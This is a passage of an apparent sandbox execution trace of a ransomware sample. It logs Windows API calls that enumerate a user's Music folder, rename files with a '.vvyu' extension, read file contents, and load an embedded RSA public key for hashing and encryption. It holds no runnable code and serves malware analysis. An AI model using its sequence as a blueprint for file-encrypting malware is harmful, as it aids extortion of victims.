Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0195.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0195.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0195.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6458 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0195.497] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0195.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.498] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0195.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0195.499] GetCurrentThreadId () returned 0x5d8 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae8388 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.499] GetCurrentThreadId () returned 0x5d8 [0195.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0195.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0195.500] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0195.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0195.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64b8 [0195.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0195.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6458 [0195.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6470 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6440 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64d0 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae64a0 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0195.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6488 [0195.502] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae64e8 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6488 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64a0 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6458 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8e0 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64b8 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64e8 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0195.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.503] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0195.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0195.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0195.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6458 | out: hHeap=0x2c0000) returned 1 [0195.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0195.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0195.504] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0195.504] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0195.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0195.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0195.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0195.505] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0195.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0195.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0195.506] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6488 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae64d0 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6470 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6440 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0195.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0195.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0195.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6428 | out: hHeap=0x2c0000) returned 1 [0195.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae1f00 | out: hHeap=0x2c0000) returned 1 [0195.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0195.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0195.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0195.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0195.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0195.511] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0xc11f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0xc11f, lpOverlapped=0x0) returned 1 [0195.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0195.512] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc124, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.512] WriteFile (in: hFile=0x584, lpBuffer=0x2ae01d0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae01d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0195.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0195.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0195.513] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0195.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0195.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.514] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0195.514] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.514] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.514] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0195.514] CloseHandle (hObject=0x584) returned 1 [0195.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0195.516] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0195.517] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0195.517] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\dIbGo7.wav" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\dibgo7.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\dIbGo7.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\dibgo7.wav.vvyu")) returned 1 [0195.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0195.518] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0195.518] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.521] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0195.521] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b3f6df0, ftCreationTime.dwHighDateTime=0x1d8a665, ftLastAccessTime.dwLowDateTime=0x2eb69040, ftLastAccessTime.dwHighDateTime=0x1d8a723, ftLastWriteTime.dwLowDateTime=0x2eb69040, ftLastWriteTime.dwHighDateTime=0x1d8a723, nFileSizeHigh=0x0, nFileSizeLow=0x10dae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qIaOB8kqT6Gjfc.m4a", cAlternateFileName="QIAOB8~1.M4A")) returned 1 [0195.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2f018 [0195.521] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2adfe08 [0195.522] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2f018 | out: hHeap=0x2c0000) returned 1 [0195.522] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\qIaOB8kqT6Gjfc.m4a") returned=".m4a" [0195.522] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\qIaOB8kqT6Gjfc.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\j uck2lalp_ipp\\qiaob8kqt6gjfc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0195.522] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=69038) returned 1 [0195.522] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0195.525] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x10d88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.525] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0195.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0195.528] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.528] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x10dae, lpOverlapped=0x0) returned 1 [0195.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0195.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.529] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0195.530] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0195.530] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.530] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0195.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0195.530] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0195.530] GetLastError () returned 0x0 [0195.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0195.530] GetLastError () returned 0x0 